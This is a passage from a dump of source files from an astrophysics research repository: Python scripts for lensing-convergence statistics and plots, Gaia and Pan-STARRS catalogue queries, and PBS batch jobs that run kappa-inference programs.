%s%s_optresult.dat\" % (prefix_out,str(i + 1)))\r\n os.system(\"rm %s%s_subtract.fits\" % (prefix_out,str(i + 1)))\r\n\r\n\r\n\r\n\r\n" }, { "alpha_fraction": 0.5815498232841492, "alphanum_fraction": 0.6885609030723572, "avg_line_length": 51.153846740722656, "blob_id": "ced54cb774a15bc5cde4dc1d2db3f05ec987897c", "content_id": "4d90a94ac76feee5a0027d15b41162e2a4f684b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1355, "license_type": "no_license", "max_line_length": 158, "num_lines": 26, "path": "/python/tabsampmed.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "import numpy as np\nimport os\nfrom os import system\ntab_gal=np.loadtxt('GGL_los_N_4096_ang_4_Guo_galaxies_on_plane_27_to_63_pdzmstar_noJHKs_B1608_tab_size120_i24_ratioquick.lst',usecols=[6], unpack=True)\ntab_oneoverr=np.loadtxt('GGL_los_N_4096_ang_4_Guo_galaxies_on_plane_27_to_63_pdzmstar_noJHKs_B1608_tab_size120_i24_ratioquick.lst',usecols=[8], unpack=True)\ntab_massoverr=np.loadtxt('GGL_los_N_4096_ang_4_Guo_galaxies_on_plane_27_to_63_pdzmstar_noJHKs_B1608_tab_size120_i24_ratioquick.lst',usecols=[24], unpack=True)\ntab_zoverr=np.loadtxt('GGL_los_N_4096_ang_4_Guo_galaxies_on_plane_27_to_63_pdzmstar_noJHKs_B1608_tab_size120_i24_ratioquick.lst',usecols=[22], unpack=True)\ntab_mass3=np.loadtxt('GGL_los_N_4096_ang_4_Guo_galaxies_on_plane_27_to_63_pdzmstar_noJHKs_B1608_tab_size120_i24_ratioquick.lst',usecols=[18], unpack=True)\nos.system(\"rm tab_24.lst\")\nv = np.zeros(100)\nw = np.zeros(100)\nx = np.zeros(100)\ny = np.zeros(100)\nz = np.zeros(100)\nfor i in range(len(tab_massoverr)/100):\n for j in range(100):\n v[j]=tab_gal[i*100+j]\n w[j]=tab_oneoverr[i*100+j]\n x[j]=tab_massoverr[i*100+j]\n y[j]=tab_zoverr[i*100+j]\n z[j]=tab_mass3[i*100+j]\n f=open('tab_24.lst','a')\n f.write('%s %s %s %s %s \\n' 
%(np.median(v),np.median(w),np.median(x),np.median(y),np.median(z)))\n f.close()\n if i%1000==0:\n print i" }, { "alpha_fraction": 0.6048252582550049, "alphanum_fraction": 0.7191739678382874, "avg_line_length": 82.59217834472656, "blob_id": "3c040709f0966ee0c3b586be426aa1c9f9be2de1", "content_id": "38e3b2f3b83e83695e634ca333ea16cf19cb62f7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14963, "license_type": "no_license", "max_line_length": 218, "num_lines": 179, "path": "/python/plot_utilities/plotkappa_compareSAHerniques.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport scipy as sp\nfrom scipy.stats import norm\nimport numpy as np\n\nmin_kappa = -0.20\nmax_kappa = 1\n#min_kappa_plot = -0.1\n#max_kappa_plot = 0.15\nbin_stat = 2000\nhalfwidth = (max_kappa - min_kappa) / (bin_stat * 2.0)\n\nroot = \"/Users/cerusu/Dropbox/Davis_work/code/0408/test/\"\n\ndef statistics(kappa_all_,bin_stat_,min_kappa_,max_kappa_):\n a, kappa_values = np.histogram([0], bins = bin_stat_, range=(min_kappa_,max_kappa_)) # create an empty histogram of the correct shape\n\n sum = np.sum(kappa_all_)\n #meanX = np.sum(kappa_counts * (kappa_values[:-1] + halfwidth)) / sum\n #meanX2 = np.sum(kappa_counts * (kappa_values[:-1] + halfwidth) ** 2) / sum\n #std = np.sqrt(meanX2 - meanX**2)\n\n med = 0\n i = 0\n ok = False\n while (med <= sum/2.0) and (ok == False):\n med = med + kappa_all_[i]\n if med > sum/2.0:\n median = kappa_values[i] + halfwidth\n ok = True\n if med == sum/2.0:\n median = kappa_values[i] + 2 * halfwidth\n ok = True\n i = i + 1\n\n std = 0\n ok = False\n i = 0\n while (std <= sum * 0.16) and (ok == False):\n std = std + kappa_all_[i]\n if std > sum * 0.16:\n std1_ = kappa_values[i] + halfwidth\n ok = True\n if med == sum*0.16:\n std1_ = kappa_values[i] + 2 * halfwidth\n ok = True\n i = i + 1\n\n std = 0\n ok = False\n i = 0\n while (std <= sum*0.84) and (ok == False):\n std = std + kappa_all_[i]\n if std > sum*0.84:\n std1 = kappa_values[i] + halfwidth\n ok = True\n if med == sum*0.84:\n std1 = kappa_values[i] + 2 * halfwidth\n ok = True\n i = i + 1\n\n stddev = (std1 - std1_) / 2\n\n return median,stddev,kappa_values\n\nkappa_45_1_z1 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_45_gal_22.5_med_increments2_zeta1.cat\" % root, usecols=[0], unpack=True)\nmedian_45_1_z1,stddev0,kappa_values = statistics(kappa_45_1_z1,bin_stat,min_kappa,max_kappa)\nkappa_45_1_z2 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_45_gal_22.5_med_increments2_zeta2.cat\" % root, usecols=[0], unpack=True)\nmedian_45_1_z2,stddev0,kappa_values = statistics(kappa_45_1_z2,bin_stat,min_kappa,max_kappa)\nkappa_45_1_z05 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_45_gal_22.5_med_increments2_zeta05.cat\" % root, usecols=[0], unpack=True)\nmedian_45_1_z05,stddev0,kappa_values = statistics(kappa_45_1_z05,bin_stat,min_kappa,max_kappa)\n\nkappa_45_1_z1_H = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_45_gal_22.5_med_increments2Henriques_zeta1.cat\" % root, usecols=[0], unpack=True)\nmedian_45_1_z1_H,stddev0,kappa_values = statistics(kappa_45_1_z1_H,bin_stat,min_kappa,max_kappa)\nkappa_45_1_z2_H = 
np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_45_gal_22.5_med_increments2Henriques_zeta2.cat\" % root, usecols=[0], unpack=True)\nmedian_45_1_z2_H,stddev0,kappa_values = statistics(kappa_45_1_z2_H,bin_stat,min_kappa,max_kappa)\nkappa_45_1_z05_H = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_45_gal_22.5_med_increments2Henriques_zeta05.cat\" % root, usecols=[0], unpack=True)\nmedian_45_1_z05_H,stddev0,kappa_values = statistics(kappa_45_1_z05_H,bin_stat,min_kappa,max_kappa)\n\nkappa_45_1_1r_z1 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_45_gal_45_oneoverr_22.5_med_increments2_2_zeta1.cat\" % root, usecols=[0], unpack=True)\nmedian_45_1_1r_z1,stddev0,kappa_values = statistics(kappa_45_1_1r_z1,bin_stat,min_kappa,max_kappa)\nkappa_45_1_1r_z2 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_45_gal_45_oneoverr_22.5_med_increments2_2_zeta2.cat\" % root, usecols=[0], unpack=True)\nmedian_45_1_1r_z2,stddev0,kappa_values = statistics(kappa_45_1_1r_z2,bin_stat,min_kappa,max_kappa)\nkappa_45_1_1r_z05 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_45_gal_45_oneoverr_22.5_med_increments2_2_zeta05.cat\" % root, usecols=[0], unpack=True)\nmedian_45_1_1r_z05,stddev0,kappa_values = statistics(kappa_45_1_1r_z05,bin_stat,min_kappa,max_kappa)\n\nkappa_45_1_1r_z1_H = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_45_gal_45_oneoverr_22.5_med_increments2_2Henriques_zeta1.cat\" % root, usecols=[0], unpack=True)\nmedian_45_1_1r_z1_H,stddev0,kappa_values = statistics(kappa_45_1_1r_z1_H,bin_stat,min_kappa,max_kappa)\nkappa_45_1_1r_z2_H = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_45_gal_45_oneoverr_22.5_med_increments2_2Henriques_zeta2.cat\" % root, usecols=[0], unpack=True)\nmedian_45_1_1r_z2_H,stddev0,kappa_values = statistics(kappa_45_1_1r_z2_H,bin_stat,min_kappa,max_kappa)\nkappa_45_1_1r_z05_H = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_45_gal_45_oneoverr_22.5_med_increments2_2Henriques_zeta05.cat\" % root, usecols=[0], unpack=True)\nmedian_45_1_1r_z05_H,stddev0,kappa_values = statistics(kappa_45_1_1r_z05_H,bin_stat,min_kappa,max_kappa)\n\nkappa_45_1_zr_z1 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_45_gal_45_zoverr_22.5_med_increments2_2_zeta1.cat\" % root, usecols=[0], unpack=True)\nmedian_45_1_zr_z1,stddev0,kappa_values = statistics(kappa_45_1_zr_z1,bin_stat,min_kappa,max_kappa)\nkappa_45_1_zr_z2 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_45_gal_45_zoverr_22.5_med_increments2_2_zeta2.cat\" % root, usecols=[0], unpack=True)\nmedian_45_1_zr_z2,stddev0,kappa_values = statistics(kappa_45_1_zr_z2,bin_stat,min_kappa,max_kappa)\nkappa_45_1_zr_z05 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_45_gal_45_zoverr_22.5_med_increments2_2_zeta05.cat\" % root, usecols=[0], unpack=True)\nmedian_45_1_zr_z05,stddev0,kappa_values = statistics(kappa_45_1_zr_z05,bin_stat,min_kappa,max_kappa)\n\nkappa_45_1_zr_z1_H = 
np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_45_gal_45_zoverr_22.5_med_increments2_2Henriques_zeta1.cat\" % root, usecols=[0], unpack=True)\nmedian_45_1_zr_z1_H,stddev0,kappa_values = statistics(kappa_45_1_zr_z1_H,bin_stat,min_kappa,max_kappa)\nkappa_45_1_zr_z2_H = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_45_gal_45_zoverr_22.5_med_increments2_2Henriques_zeta2.cat\" % root, usecols=[0], unpack=True)\nmedian_45_1_zr_z2_H,stddev0,kappa_values = statistics(kappa_45_1_zr_z2_H,bin_stat,min_kappa,max_kappa)\nkappa_45_1_zr_z05_H = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_45_gal_45_zoverr_22.5_med_increments2_2Henriques_zeta05.cat\" % root, usecols=[0], unpack=True)\nmedian_45_1_zr_z05_H,stddev0,kappa_values = statistics(kappa_45_1_zr_z05_H,bin_stat,min_kappa,max_kappa)\n\nkappa_120_1_z1 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_22.5_med_increments2_zeta1.cat\" % root, usecols=[0], unpack=True)\nmedian_120_1_z1,stddev0,kappa_values = statistics(kappa_120_1_z1,bin_stat,min_kappa,max_kappa)\nkappa_120_1_z2 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_22.5_med_increments2_zeta2.cat\" % root, usecols=[0], unpack=True)\nmedian_120_1_z2,stddev0,kappa_values = statistics(kappa_120_1_z2,bin_stat,min_kappa,max_kappa)\nkappa_120_1_z05 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_22.5_med_increments2_zeta05.cat\" % root, usecols=[0], unpack=True)\nmedian_120_1_z05,stddev0,kappa_values = statistics(kappa_120_1_z05,bin_stat,min_kappa,max_kappa)\n\nkappa_120_1_z1_H = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_22.5_med_increments2Henriques_zeta1.cat\" % root, usecols=[0], unpack=True)\nmedian_120_1_z1_H,stddev0,kappa_values = statistics(kappa_120_1_z1_H,bin_stat,min_kappa,max_kappa)\nkappa_120_1_z2_H = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_22.5_med_increments2Henriques_zeta2.cat\" % root, usecols=[0], unpack=True)\nmedian_120_1_z2_H,stddev0,kappa_values = statistics(kappa_120_1_z2_H,bin_stat,min_kappa,max_kappa)\nkappa_120_1_z05_H = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_22.5_med_increments2Henriques_zeta05.cat\" % root, usecols=[0], unpack=True)\nmedian_120_1_z05_H,stddev0,kappa_values = statistics(kappa_120_1_z05_H,bin_stat,min_kappa,max_kappa)\n\nkappa_120_1_1r_z1 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_120_oneoverr_22.5_med_increments2_2_zeta1.cat\" % root, usecols=[0], unpack=True)\nmedian_120_1_1r_z1,stddev0,kappa_values = statistics(kappa_120_1_1r_z1,bin_stat,min_kappa,max_kappa)\nkappa_120_1_1r_z2 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_120_oneoverr_22.5_med_increments2_2_zeta2.cat\" % root, usecols=[0], unpack=True)\nmedian_120_1_1r_z2,stddev0,kappa_values = statistics(kappa_120_1_1r_z2,bin_stat,min_kappa,max_kappa)\nkappa_120_1_1r_z05 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_120_oneoverr_22.5_med_increments2_2_zeta05.cat\" % root, usecols=[0], 
unpack=True)\nmedian_120_1_1r_z05,stddev0,kappa_values = statistics(kappa_120_1_1r_z05,bin_stat,min_kappa,max_kappa)\n\nkappa_120_1_1r_z1_H = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_120_oneoverr_22.5_med_increments2_2Henriques_zeta1.cat\" % root, usecols=[0], unpack=True)\nmedian_120_1_1r_z1_H,stddev0,kappa_values = statistics(kappa_120_1_1r_z1_H,bin_stat,min_kappa,max_kappa)\nkappa_120_1_1r_z2_H = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_120_oneoverr_22.5_med_increments2_2Henriques_zeta2.cat\" % root, usecols=[0], unpack=True)\nmedian_120_1_1r_z2_H,stddev0,kappa_values = statistics(kappa_120_1_1r_z2_H,bin_stat,min_kappa,max_kappa)\nkappa_120_1_1r_z05_H = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_120_oneoverr_22.5_med_increments2_2Henriques_zeta05.cat\" % root, usecols=[0], unpack=True)\nmedian_120_1_1r_z05_H,stddev0,kappa_values = statistics(kappa_120_1_1r_z05_H,bin_stat,min_kappa,max_kappa)\n\nkappa_120_1_zr_z1 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_120_zoverr_22.5_med_increments2_2_zeta1.cat\" % root, usecols=[0], unpack=True)\nmedian_120_1_zr_z1,stddev0,kappa_values = statistics(kappa_120_1_zr_z1,bin_stat,min_kappa,max_kappa)\nkappa_120_1_zr_z2 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_120_zoverr_22.5_med_increments2_2_zeta2.cat\" % root, usecols=[0], unpack=True)\nmedian_120_1_zr_z2,stddev0,kappa_values = statistics(kappa_120_1_zr_z2,bin_stat,min_kappa,max_kappa)\nkappa_120_1_zr_z05 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_120_zoverr_22.5_med_increments2_2_zeta05.cat\" % root, usecols=[0], unpack=True)\nmedian_120_1_zr_z05,stddev0,kappa_values = statistics(kappa_120_1_zr_z05,bin_stat,min_kappa,max_kappa)\n\nkappa_120_1_zr_z1_H = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_120_zoverr_22.5_med_increments2_2Henriques_zeta1.cat\" % root, usecols=[0], unpack=True)\nmedian_120_1_zr_z1_H,stddev0,kappa_values = statistics(kappa_120_1_zr_z1_H,bin_stat,min_kappa,max_kappa)\nkappa_120_1_zr_z2_H = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_120_zoverr_22.5_med_increments2_2Henriques_zeta2.cat\" % root, usecols=[0], unpack=True)\nmedian_120_1_zr_z2_H,stddev0,kappa_values = statistics(kappa_120_1_zr_z2_H,bin_stat,min_kappa,max_kappa)\nkappa_120_1_zr_z05_H = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_120_zoverr_22.5_med_increments2_2Henriques_zeta05.cat\" % root, usecols=[0], unpack=True)\nmedian_120_1_zr_z05_H,stddev0,kappa_values = statistics(kappa_120_1_zr_z05_H,bin_stat,min_kappa,max_kappa)\n\nplt.subplot(1,1,1)\nax = plt.subplot(1,1,1)\nax.tick_params(labelsize=15)\nplt.clf()\n#winlen = 12\n\nplt.plot([0.5,1,2],[median_45_1_z05,median_45_1_z1,median_45_1_z2],color='k', linewidth=1, linestyle='-', label ='SA $45: 1$')\nplt.plot([0.5,1,2],[median_45_1_z05_H,median_45_1_z1_H,median_45_1_z2_H],color='k', linewidth=1, linestyle='--', label ='Henriques $45: 1$')\nplt.plot([0.5,1,2],[median_45_1_1r_z05,median_45_1_1r_z1,median_45_1_1r_z2],color='b', linewidth=1, linestyle='-', label ='SA $45: 
1+1/r$')\nplt.plot([0.5,1,2],[median_45_1_1r_z05_H,median_45_1_1r_z1_H,median_45_1_1r_z2_H],color='b', linewidth=1, linestyle='--', label ='Henriques $45: 1+1/r$')\nplt.plot([0.5,1,2],[median_45_1_zr_z05,median_45_1_zr_z1,median_45_1_zr_z2],color='r', linewidth=1, linestyle='-', label ='SA $45: 1+z/r$')\nplt.plot([0.5,1,2],[median_45_1_zr_z05_H,median_45_1_zr_z1_H,median_45_1_zr_z2_H],color='r', linewidth=1, linestyle='--', label ='Henriques $45: 1+z/r$')\n\nplt.plot([0.5,1,2],[median_120_1_z05,median_120_1_z1,median_120_1_z2],color='k', linewidth=3, linestyle='-', label ='SA $120: 1$')\nplt.plot([0.5,1,2],[median_120_1_z05_H,median_120_1_z1_H,median_120_1_z2_H],color='k', linewidth=3, linestyle='--', label ='Henriques $120: 1$')\nplt.plot([0.5,1,2],[median_120_1_1r_z05,median_120_1_1r_z1,median_120_1_1r_z2],color='b', linewidth=3, linestyle='-', label ='SA $120: 1+1/r$')\nplt.plot([0.5,1,2],[median_120_1_1r_z05_H,median_120_1_1r_z1_H,median_120_1_1r_z2_H],color='b', linewidth=3, linestyle='--', label ='Henriques $120: 1+1/r$')\nplt.plot([0.5,1,2],[median_120_1_zr_z05,median_120_1_zr_z1,median_120_1_zr_z2],color='r', linewidth=3, linestyle='-', label ='SA $120: 1+z/r$')\nplt.plot([0.5,1,2],[median_120_1_zr_z05_H,median_120_1_zr_z1_H,median_120_1_zr_z2_H],color='r', linewidth=3, linestyle='--', label ='Henriques $120: 1+z/r$')\n\nplt.xlabel(r'$\\zeta$', fontsize=20)\nplt.ylabel(r'median ($\\kappa)$', fontsize=20)\nplt.xticks([0.5,1,2])\nplt.legend(loc=\"upper left\",fontsize=7)\nplt.title(\"SA - Henriques comparison $z_s=2.4$\",fontsize=14)\nplt.savefig('%sSAHenriquescomparison0408.png' % root, dpi=250, bbox_inches='tight')\n" }, { "alpha_fraction": 0.6611374616622925, "alphanum_fraction": 0.7511848211288452, "avg_line_length": 22.44444465637207, "blob_id": "adbc33b1b9e37d4dc1b1f3ecdff75fa98152ecc8", "content_id": "f841ba95912c1cfd6053f71f7162f66e9e935e3c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 422, "license_type": "no_license", "max_line_length": 95, "num_lines": 18, "path": "/python/scripts/NAOJ/batch_infer18.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1m\n#PBS -o Log18.out\n#PBS -e Log18.err\n#PBS -N 18\n#PBS -l mem=16gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /mfst01a/rusucs/WFI2033/MSwghtratios/\n\npython inferkappa_unbiasedwithshearincrement2226.py WFI2033 5 45 23 meds gal gamma oneoverr SIS\npython inferkappa_unbiasedwithshear.py WFI2033 5 120 23 meds gal gamma oneoverr SIS\n" }, { "alpha_fraction": 0.686170220375061, "alphanum_fraction": 0.7748227119445801, "avg_line_length": 27.200000762939453, "blob_id": "e88e8320f67d44ac176c897d4297cceb0e2d97c9", "content_id": "c770dadaeec1e35b3f52d2c34554e99a347a9aaa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 564, "license_type": "no_license", "max_line_length": 82, "num_lines": 20, "path": "/python/scripts/NAOJ/batch_infersim9.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1m\n#PBS -o Log9s.out\n#PBS -e Log9s.err\n#PBS -N 9s\n#PBS -l mem=16gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /mfst01a/rusucs/WFI2033/MSwghtratios/\n\npython inferkappasimbias.py WFI2033 5 45 23 meds gal gamma oneoverr massoverr\npython inferkappasimbias.py 
WFI2033 5 120 23 meds gal gamma oneoverr massoverr\npython inferkappasimbiasphil.py WFI2033 5 45 23 meds gal gamma oneoverr massoverr\npython inferkappasimbiasphil.py WFI2033 5 120 23 meds gal gamma oneoverr massoverr\n" }, { "alpha_fraction": 0.5414499044418335, "alphanum_fraction": 0.5639958381652832, "avg_line_length": 46.26229476928711, "blob_id": "7126992a8b1ccaeb6fcc03c80a610b794a4e2a35", "content_id": "a8a3dbe859f33b80772e29dfbc4fa42aa7c4b2a4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2883, "license_type": "no_license", "max_line_length": 237, "num_lines": 61, "path": "/python/catalogue_utilities/GaiaPS1search.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Cone search\nimport numpy as np\nimport astropy.units as u\n\nsearch = \"Gaia\"\n#search = \"PS1\"\n#file = \"/Volumes/LaCieSubaru/Ciprian_candidates/candidatesJan2019.cat\"\n#file = \"/Users/cerusu/OneDrive - Subaru Telescope/candidates.cat\"\nfile = \"/Users/cerusu/Dropbox/clustermostpromising.txt\"\ncat = np.loadtxt(file, usecols = [0,1], unpack=True)\n\nif search == \"Gaia\":\n from astropy.coordinates import SkyCoord\n from astroquery.gaia import Gaia\n #rad = 9.0 # arcsec # used for Gaia\n rad = 20.0 # arcsec\n radius = u.Quantity(rad, u.arcsec)\n #for i in range(1):\n for i in range(len(cat[0])):\n coord = SkyCoord(ra=cat[0][i], dec=cat[1][i], unit=(u.degree, u.degree), frame='icrs')\n j = Gaia.cone_search_async(coord, radius)\n r = j.get_results()\n #print r.columns\n print cat[0][i], cat[1][i]\n print 'dist ra dec G astrom_exc_noise astrom_exc_noise_sig proper_motion_significance'\n for j in range(len(r)):\n #if j ==1: print cat[0][i], cat[1][i], SkyCoord(cat[0][i], cat[1][i], unit='deg').separation(SkyCoord(r[j]['ra'], r[j]['dec'], unit='deg')).arcsec, r[j]['phot_g_mean_mag'],r[j]['phot_bp_mean_mag'],r[j]['phot_rp_mean_mag']\n print r[j]['dist']*3600,r[j]['ra'],r[j]['dec'],r[j]['phot_g_mean_mag'],r[j]['astrometric_excess_noise'],r[j]['astrometric_excess_noise_sig'],np.sqrt((r[j]['pmra']/r[j]['pmra_error'])**2+(r[j]['pmdec']/r[j]['pmdec_error'])**2)\n\ndef panstarrs_query(ra_deg, dec_deg, rad_asec, maxmag=23,\n maxsources=1): # from https://michaelmommert.wordpress.com/2017/02/13/accessing-the-gaia-and-pan-starrs-catalogs-using-python/\n \"\"\"\n Query PanSTARRS @ VizieR using astroquery.vizier\n :param ra_deg: RA in degrees\n :param dec_deg: Declination in degrees\n :param rad_deg: field radius in degrees\n :param maxmag: upper limit G magnitude (optional)\n :param maxsources: maximum number of sources\n :return: astropy.table object\n \"\"\"\n vquery = Vizier(columns=['RAJ2000', 'DEJ2000',\n 'gmag', 'e_gmag',\n 'rmag', 'e_rmag',\n 'imag', 'e_imag'],\n column_filters={\"gmag\":\n (\"<%f\" % maxmag)},\n row_limit=maxsources)\n field = coord.SkyCoord(ra=ra_deg, dec=dec_deg,\n unit=(u.deg, u.deg),\n frame='icrs')\n return vquery.query_region(field,\n width=(\"%fd\" % (rad_asec / 3600.0)),\n catalog=\"II/349/ps1\")[0]\n\nif search == \"PS1\":\n rad = 1.0 # arcsec\n from astroquery.vizier import Vizier\n import astropy.coordinates as coord\n for i in range(len(cat[0])):\n try: print(panstarrs_query(cat[0][i], cat[1][i], 2))\n except: pass\n" }, { "alpha_fraction": 0.5877862572669983, "alphanum_fraction": 0.6005089282989502, "avg_line_length": 18.600000381469727, "blob_id": "31c722ad15e8a4858c36f43caaeea3e55a290d14", "content_id": "31881dd544f7530888b65f2c0e0cede507a848fb", "detected_licenses": [], "is_generated": false, 
"is_vendor": false, "language": "Python", "length_bytes": 393, "license_type": "no_license", "max_line_length": 71, "num_lines": 20, "path": "/python/modeling_utilities/mytest_classes.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "\nclass MyClass:\n \"\"\"A simple example class\"\"\"\n i = 12345\n \n def f(self):\n return 'hello world'\n\n# import mytest\n# x=mytest.MyClass.i\n# x=mytest.MyClass.f()\n\nclass Dog:\n\n kind = 'canine' # class variable shared by all instances\n\n def __init__(self, name):\n self.name = name # instance variable unique to each instance\n\n# x=mytest.Dog('Fido')\n# x.name\n" }, { "alpha_fraction": 0.67641681432724, "alphanum_fraction": 0.6959171295166016, "avg_line_length": 48.727272033691406, "blob_id": "194f8b7d874970e00477e9466097953ac714db5b", "content_id": "e08a050ed2633938b9be2a384c647f20048e68ca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1641, "license_type": "no_license", "max_line_length": 260, "num_lines": 33, "path": "/python/reduction_utilities/IRCSquickreduce.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# run as: source activate iraf27; python /Users/cerusu/GITHUB/zMstarPDF/python/reduction_utilities/IRCSquickreduce.py /Volumes/LaCieSubaru/J1640+1932/H/\n\nimport os\nimport numpy as np\nfrom numpy import inf\nfrom astropy.io import fits\nimport numpy as np\nimport sys\nimport glob\n\nos.system('/Applications/ds9.darwinsierra.7.5/ds9 &')\npath = str(sys.argv[1])\n#target = str(sys.argv[2])\ntarget = 'reduced'\ntry: os.mkdir(path+target)\nexcept: pass\nos.chdir(path+target)\nfiles = glob.glob('../*.fits')\nfilesuse = []\nfor i in range(len(files)):\n frame = fits.open(files[i])\n #if (frame[0].header['OBJECT'] == target) and (files[i] != '../flat.fits'): filesuse = np.append(filesuse,files[i])\n if files[i] != '../flat.fits': filesuse = np.append(filesuse,files[i])\n\nnp.savetxt(target+'.cat',filesuse,fmt='%s')\nos.system('python /Users/cerusu/GITHUB/pyircs_imgred/frcheck.py %s' % target+'.cat')\ncreateflat = False\nif createflat == True:\n os.system('python /Users/cerusu/GITHUB/pyircs_imgred/imgred_all.py %s %s.fits --combine=median --skyflat --flat=%sflat.fits --bpm=/Users/cerusu/GITHUB/pyircs_imgred/DATA/ircs_bpmask.fits --start=0 --end=1' %(target+'.cat',target,target))\n os.system('cp %sflat.fits ../../' % target)\nelse:\n os.system('python /Users/cerusu/GITHUB/pyircs_imgred/imgred_all.py %s %s.fits --combine=median --flat=../../J2354_flat.fits --bpm=/Users/cerusu/GITHUB/pyircs_imgred/DATA/ircs_bpmask.fits --start=0 --end=8 --nsigma=10 --minpix=1000' %(target+'.cat',target))\n# !!!!!!!!!!!!! 
